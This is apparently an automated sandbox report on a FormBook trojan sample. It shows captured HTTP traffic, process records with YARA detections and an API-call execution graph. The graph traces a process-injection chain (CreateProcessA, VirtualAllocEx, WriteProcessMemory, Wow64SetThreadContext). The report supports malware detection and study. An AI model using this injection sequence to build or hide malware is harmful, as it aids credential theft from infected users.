64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                          Dec 2, 2023 18:51:17.698240042 CET1340INData Raw: 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c 3d 22
                                                                          Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="
                                                                          Dec 2, 2023 18:51:17.698252916 CET1340INData Raw: 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63
                                                                          Data Ascii: 2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                          Dec 2, 2023 18:51:17.698271036 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                          Dec 2, 2023 18:51:17.698283911 CET1340INData Raw: 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65
                                                                          Data Ascii: ved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <pa
                                                                          Dec 2, 2023 18:51:17.698297977 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c 31 2c
                                                                          Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo-p
                                                                          Dec 2, 2023 18:51:17.698311090 CET1340INData Raw: 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 72
                                                                          Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                          Dec 2, 2023 18:51:17.698324919 CET1340INData Raw: 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width="1
                                                                          Dec 2, 2023 18:51:17.698338032 CET1340INData Raw: 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e 33 34
                                                                          Data Ascii: h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g><
                                                                          Dec 2, 2023 18:51:17.698354006 CET1340INData Raw: 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                          Data Ascii: 25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-4.
                                                                          Dec 2, 2023 18:51:17.878627062 CET1340INData Raw: 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c 30 63
                                                                          Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,4.


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:18:47:09
                                                                          Start date:02/12/2023
                                                                          Path:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Imagebase:0xdc0000
                                                                          File size:1'154'048 bytes
                                                                          MD5 hash:7391F0C0A4CD63ECEDEF46DBB072542C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:18:47:11
                                                                          Start date:02/12/2023
                                                                          Path:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          Imagebase:0xc40000
                                                                          File size:1'154'048 bytes
                                                                          MD5 hash:7391F0C0A4CD63ECEDEF46DBB072542C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:18:47:14
                                                                          Start date:02/12/2023
                                                                          Path:C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe"
                                                                          Imagebase:0xbd0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:5
                                                                          Start time:18:47:16
                                                                          Start date:02/12/2023
                                                                          Path:C:\Windows\SysWOW64\isoburn.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\isoburn.exe
                                                                          Imagebase:0xa40000
                                                                          File size:107'008 bytes
                                                                          MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:7
                                                                          Start time:18:47:27
                                                                          Start date:02/12/2023
                                                                          Path:C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe"
                                                                          Imagebase:0xbd0000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:8
                                                                          Start time:18:47:38
                                                                          Start date:02/12/2023
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                          Imagebase:0x7ff79f9e0000
                                                                          File size:676'768 bytes
                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:12.6%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:338
                                                                            Total number of Limit Nodes:19
                                                                            execution_graph 46638 6526e60 46639 6526e8d 46638->46639 46656 6526bf0 46639->46656 46642 6526bf0 5 API calls 46643 6526fe0 46642->46643 46660 6526c00 46643->46660 46645 6527012 46646 6526bf0 5 API calls 46645->46646 46647 6527044 46646->46647 46648 6526bf0 5 API calls 46647->46648 46649 6527076 46648->46649 46650 6526bf0 5 API calls 46649->46650 46651 65270a8 46650->46651 46652 6526bf0 5 API calls 46651->46652 46653 65270da 46652->46653 46654 6526bf0 5 API calls 46653->46654 46655 652710c 46654->46655 46657 6526bfb 46656->46657 46658 6526fae 46657->46658 46666 6526dc0 46657->46666 46658->46642 46661 6526c0b 46660->46661 46663 3157934 5 API calls 46661->46663 46664 3158b61 5 API calls 46661->46664 46665 3158b3f 5 API calls 46661->46665 46662 6529e70 46662->46645 46663->46662 46664->46662 46665->46662 46667 6526dcb 46666->46667 46672 3157934 46667->46672 46679 3158b3f 46667->46679 46686 3158b61 46667->46686 46668 6529bdc 46668->46658 46673 315793f 46672->46673 46675 3158e23 46673->46675 46693 315b0c0 46673->46693 46674 3158e61 46674->46668 46675->46674 46697 315d181 46675->46697 46702 315d190 46675->46702 46680 3158bbd 46679->46680 46682 3158e23 46680->46682 46685 315b0c0 3 API calls 46680->46685 46681 3158e61 46681->46668 46682->46681 46683 315d181 5 API calls 46682->46683 46684 315d190 5 API calls 46682->46684 46683->46681 46684->46681 46685->46682 46687 3158b9b 46686->46687 46689 3158e23 46687->46689 46692 315b0c0 3 API calls 46687->46692 46688 3158e61 46688->46668 46689->46688 46690 315d181 5 API calls 46689->46690 46691 315d190 5 API calls 46689->46691 46690->46688 46691->46688 46692->46689 46707 315b0f8 46693->46707 46711 315b0e8 46693->46711 46694 315b0d6 46694->46675 46698 315d18e 46697->46698 46699 315d1d5 46698->46699 46744 315d340 46698->46744 46748 315d32f 46698->46748 46699->46674 46704 315d1b1 46702->46704 46703 315d1d5 46703->46674 46704->46703 46705 315d340 5 API calls 46704->46705 46706 315d32f 5 API calls 46704->46706 46705->46703 46706->46703 46716 315b1f0 46707->46716 46724 315b1df 46707->46724 46708 315b107 46708->46694 46712 315b0f8 46711->46712 46714 315b1f0 2 API calls 46712->46714 46715 315b1df 2 API calls 46712->46715 46713 315b107 46713->46694 46714->46713 46715->46713 46717 315b201 46716->46717 46718 315b224 46716->46718 46717->46718 46732 315b488 46717->46732 46736 315b47a 46717->46736 46718->46708 46719 315b21c 46719->46718 46720 315b428 GetModuleHandleW 46719->46720 46721 315b455 46720->46721 46721->46708 46725 315b201 46724->46725 46726 315b224 46724->46726 46725->46726 46730 315b488 LoadLibraryExW 46725->46730 46731 315b47a LoadLibraryExW 46725->46731 46726->46708 46727 315b21c 46727->46726 46728 315b428 GetModuleHandleW 46727->46728 46729 315b455 46728->46729 46729->46708 46730->46727 46731->46727 46733 315b49c 46732->46733 46734 315b4c1 46733->46734 46740 315ac40 46733->46740 46734->46719 46738 315b488 46736->46738 46737 315b4c1 46737->46719 46738->46737 46739 315ac40 LoadLibraryExW 46738->46739 46739->46737 46741 315b648 LoadLibraryExW 46740->46741 46743 315b6c1 46741->46743 46743->46734 46745 315d34d 46744->46745 46747 315d387 46745->46747 46752 315cc80 46745->46752 46747->46699 46750 315d34d 46748->46750 46749 315d387 46749->46699 46750->46749 46751 315cc80 5 API calls 46750->46751 46751->46749 46753 315cc8b 46752->46753 46755 315dc98 46753->46755 46756 315cdac 46753->46756 46755->46755 46757 315cdb7 46756->46757 46758 3157934 5 API calls 46757->46758 46759 315dd07 46758->46759 46762 315fa8c 46759->46762 46763 315dd41 46762->46763 46764 315faa5 46762->46764 46763->46755 46768 6520dba 46764->46768 46774 6520dc8 46764->46774 46770 6520dc3 46768->46770 46769 6520ea2 46769->46769 46770->46769 46780 6521c90 46770->46780 46784 6521ce4 46770->46784 46791 6521ca0 46770->46791 46775 6520df3 46774->46775 46776 6520ea2 46775->46776 46777 6521c90 CreateWindowExW 46775->46777 46778 6521ca0 CreateWindowExW 46775->46778 46779 6521ce4 2 API calls 46775->46779 46777->46776 46778->46776 46779->46776 46781 6521ca0 46780->46781 46782 6520ab8 CreateWindowExW 46781->46782 46783 6521cd5 46782->46783 46783->46769 46785 6521cb5 46784->46785 46786 6521cef CreateWindowExW 46784->46786 46787 6520ab8 CreateWindowExW 46785->46787 46790 6521e14 46786->46790 46788 6521cd5 46787->46788 46788->46769 46790->46790 46792 6521cb5 46791->46792 46793 6520ab8 CreateWindowExW 46792->46793 46794 6521cd5 46793->46794 46794->46769 46495 797b783 46497 797b795 46495->46497 46496 797b7cb 46497->46496 46501 797ba12 46497->46501 46508 797ba18 46497->46508 46515 797bb10 46497->46515 46503 797ba18 46501->46503 46502 797bae3 46502->46496 46503->46502 46521 797bd21 46503->46521 46544 797bcdb 46503->46544 46567 797c06e 46503->46567 46504 797bb37 46504->46496 46510 797ba2b 46508->46510 46509 797bae3 46509->46496 46510->46509 46512 797bd21 10 API calls 46510->46512 46513 797c06e 4 API calls 46510->46513 46514 797bcdb 10 API calls 46510->46514 46511 797bb37 46511->46496 46512->46511 46513->46511 46514->46511 46516 797bb29 46515->46516 46518 797bd21 10 API calls 46516->46518 46519 797c06e 4 API calls 46516->46519 46520 797bcdb 10 API calls 46516->46520 46517 797bb37 46517->46496 46518->46517 46519->46517 46520->46517 46522 797bd45 46521->46522 46581 797b39c 46522->46581 46585 797b3a8 46522->46585 46523 797bd76 46526 797bea8 46523->46526 46530 797b210 ReadProcessMemory 46523->46530 46531 797b208 ReadProcessMemory 46523->46531 46524 797bfe5 46524->46504 46525 797be15 46525->46526 46532 797b060 VirtualAllocEx 46525->46532 46533 797b059 VirtualAllocEx 46525->46533 46526->46524 46534 797af80 Wow64SetThreadContext 46526->46534 46535 797af88 Wow64SetThreadContext 46526->46535 46527 797be82 46527->46526 46529 797c09a 46527->46529 46536 797b120 WriteProcessMemory 46527->46536 46537 797b118 WriteProcessMemory 46527->46537 46528 797c135 46538 797b120 WriteProcessMemory 46528->46538 46539 797b118 WriteProcessMemory 46528->46539 46529->46526 46529->46528 46540 797b120 WriteProcessMemory 46529->46540 46541 797b118 WriteProcessMemory 46529->46541 46530->46525 46531->46525 46532->46527 46533->46527 46534->46526 46535->46526 46536->46527 46537->46527 46538->46526 46539->46526 46540->46529 46541->46529 46545 797bcf9 46544->46545 46553 797b39c CreateProcessA 46545->46553 46554 797b3a8 CreateProcessA 46545->46554 46546 797bd76 46547 797bea8 46546->46547 46589 797b210 46546->46589 46593 797b208 46546->46593 46548 797bfe5 46547->46548 46605 797af88 46547->46605 46609 797af80 46547->46609 46548->46504 46549 797be15 46549->46547 46597 797b060 46549->46597 46601 797b059 46549->46601 46550 797be82 46550->46547 46552 797c09a 46550->46552 46613 797b120 46550->46613 46617 797b118 46550->46617 46551 797c135 46563 797b120 WriteProcessMemory 46551->46563 46564 797b118 WriteProcessMemory 46551->46564 46552->46547 46552->46551 46565 797b120 WriteProcessMemory 46552->46565 46566 797b118 WriteProcessMemory 46552->46566 46553->46546 46554->46546 46563->46547 46564->46547 46565->46552 46566->46552 46568 797be98 46567->46568 46572 797bea8 46567->46572 46571 797c09a 46568->46571 46568->46572 46577 797b120 WriteProcessMemory 46568->46577 46578 797b118 WriteProcessMemory 46568->46578 46569 797c135 46575 797b120 WriteProcessMemory 46569->46575 46576 797b118 WriteProcessMemory 46569->46576 46570 797bfe5 46570->46504 46571->46569 46571->46572 46579 797b120 WriteProcessMemory 46571->46579 46580 797b118 WriteProcessMemory 46571->46580 46572->46570 46573 797af80 Wow64SetThreadContext 46572->46573 46574 797af88 Wow64SetThreadContext 46572->46574 46573->46572 46574->46572 46575->46572 46576->46572 46577->46568 46578->46568 46579->46571 46580->46571 46582 797b3a1 CreateProcessA 46581->46582 46584 797b5f3 46582->46584 46584->46584 46586 797b431 CreateProcessA 46585->46586 46588 797b5f3 46586->46588 46588->46588 46590 797b25b ReadProcessMemory 46589->46590 46592 797b29f 46590->46592 46592->46549 46594 797b210 ReadProcessMemory 46593->46594 46596 797b29f 46594->46596 46596->46549 46598 797b0a0 VirtualAllocEx 46597->46598 46600 797b0dd 46598->46600 46600->46550 46602 797b060 VirtualAllocEx 46601->46602 46604 797b0dd 46602->46604 46604->46550 46606 797afcd Wow64SetThreadContext 46605->46606 46608 797b015 46606->46608 46608->46547 46610 797afcd Wow64SetThreadContext 46609->46610 46612 797b015 46610->46612 46612->46547 46614 797b168 WriteProcessMemory 46613->46614 46616 797b1bf 46614->46616 46616->46550 46618 797b168 WriteProcessMemory 46617->46618 46620 797b1bf 46618->46620 46620->46550 46795 3154960 46796 3154972 46795->46796 46797 315497e 46796->46797 46801 3154a70 46796->46801 46806 315411c 46797->46806 46799 315499d 46802 3154a95 46801->46802 46810 3154b70 46802->46810 46814 3154b80 46802->46814 46807 3154127 46806->46807 46822 3155e3c 46807->46822 46809 3157317 46809->46799 46811 3154b80 46810->46811 46812 3154c84 46811->46812 46818 315481c 46811->46818 46816 3154ba7 46814->46816 46815 3154c84 46815->46815 46816->46815 46817 315481c CreateActCtxA 46816->46817 46817->46815 46819 3156010 CreateActCtxA 46818->46819 46821 31560d3 46819->46821 46821->46821 46823 3155e47 46822->46823 46826 31578d4 46823->46826 46825 3157c2d 46825->46809 46827 31578df 46826->46827 46830 3157904 46827->46830 46829 3157d02 46829->46825 46831 315790f 46830->46831 46832 3157934 5 API calls 46831->46832 46833 3157e05 46832->46833 46833->46829 46473 797c2d0 46474 797c45b 46473->46474 46476 797c2f6 46473->46476 46476->46474 46477 79799c0 46476->46477 46478 797c958 PostMessageW 46477->46478 46479 797c9c4 46478->46479 46479->46476 46834 14dd1b4 46835 14dd1cc 46834->46835 46836 14dd226 46835->46836 46841 6521e97 46835->46841 46846 6521ea8 46835->46846 46850 6522bf8 46835->46850 46859 6520ae4 46835->46859 46842 6521ea5 46841->46842 46843 6520ae4 CallWindowProcW 46842->46843 46844 6521e13 46842->46844 46845 6521eef 46843->46845 46844->46836 46845->46836 46847 6521ece 46846->46847 46848 6520ae4 CallWindowProcW 46847->46848 46849 6521eef 46848->46849 46849->46836 46851 6522c08 46850->46851 46852 6522c69 46851->46852 46854 6522c59 46851->46854 46884 6520c0c 46852->46884 46868 6522d90 46854->46868 46873 6522e5c 46854->46873 46879 6522d80 46854->46879 46855 6522c67 46862 6520aef 46859->46862 46860 6522c69 46861 6520c0c CallWindowProcW 46860->46861 46864 6522c67 46861->46864 46862->46860 46863 6522c59 46862->46863 46865 6522d90 CallWindowProcW 46863->46865 46866 6522d80 CallWindowProcW 46863->46866 46867 6522e5c CallWindowProcW 46863->46867 46865->46864 46866->46864 46867->46864 46870 6522da4 46868->46870 46869 6522e30 46869->46855 46888 6522e48 46870->46888 46891 6522e38 46870->46891 46874 6522e6a 46873->46874 46875 6522e1a 46873->46875 46877 6522e48 CallWindowProcW 46875->46877 46878 6522e38 CallWindowProcW 46875->46878 46876 6522e30 46876->46855 46877->46876 46878->46876 46881 6522da4 46879->46881 46880 6522e30 46880->46855 46882 6522e48 CallWindowProcW 46881->46882 46883 6522e38 CallWindowProcW 46881->46883 46882->46880 46883->46880 46885 6520c17 46884->46885 46886 652434a CallWindowProcW 46885->46886 46887 65242f9 46885->46887 46886->46887 46887->46855 46889 6522e59 46888->46889 46895 652428f 46888->46895 46889->46869 46892 6522e48 46891->46892 46893 6522e59 46892->46893 46894 652428f CallWindowProcW 46892->46894 46893->46869 46894->46893 46896 6520c0c CallWindowProcW 46895->46896 46897 652429a 46896->46897 46897->46889 46480 315d458 46481 315d49e 46480->46481 46485 315d638 46481->46485 46488 315d628 46481->46488 46482 315d58b 46492 315cd48 46485->46492 46489 315d638 46488->46489 46490 315cd48 DuplicateHandle 46489->46490 46491 315d666 46490->46491 46491->46482 46493 315d6a0 DuplicateHandle 46492->46493 46494 315d666 46493->46494 46494->46482 46621 797d248 46622 797d266 46621->46622 46623 797d270 46621->46623 46626 797d2b0 46622->46626 46631 797d29b 46622->46631 46627 797d2be 46626->46627 46630 797d2dd 46626->46630 46635 797c72c 46627->46635 46630->46623 46632 797d2a5 46631->46632 46633 797c72c FindCloseChangeNotification 46632->46633 46634 797d2d9 46633->46634 46634->46623 46636 797d428 FindCloseChangeNotification 46635->46636 46637 797d2d9 46636->46637 46637->46623

                                                                            Executed Functions

                                                                            Function 0834AF58 Relevance: 9.0, Strings: 7, Instructions: 278COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 294 834af58-834af7d 295 834af84-834afa1 294->295 296 834af7f 294->296 297 834afa9 295->297 296->295 298 834afb0-834afcc 297->298 299 834afd5-834afd6 298->299 300 834afce 298->300 301 834b337-834b33e 299->301 302 834afdb-834b007 299->302 300->297 300->301 300->302 303 834b0d6-834b0eb 300->303 304 834b0f0-834b0f9 300->304 305 834b2d3-834b2df 300->305 306 834b23e-834b255 300->306 307 834b27f-834b2a4 300->307 308 834b039-834b03d 300->308 309 834b1da-834b1de 300->309 310 834b25a-834b27a 300->310 311 834b0ba-834b0d1 300->311 312 834b17b-834b188 300->312 313 834b125-834b13d 300->313 314 834b300-834b30c 300->314 315 834b1c3-834b1d5 300->315 316 834b18d-834b1a4 300->316 317 834b2a9-834b2b5 300->317 318 834b069-834b075 300->318 319 834b009-834b00d 300->319 320 834b20a-834b216 300->320 302->298 303->298 321 834b10c-834b113 304->321 322 834b0fb-834b10a 304->322 327 834b2e6-834b2fb 305->327 328 834b2e1 305->328 306->298 307->298 333 834b050-834b057 308->333 334 834b03f-834b04e 308->334 335 834b1e0-834b1ef 309->335 336 834b1f1-834b1f8 309->336 310->298 311->298 312->298 323 834b144-834b15a 313->323 324 834b13f 313->324 331 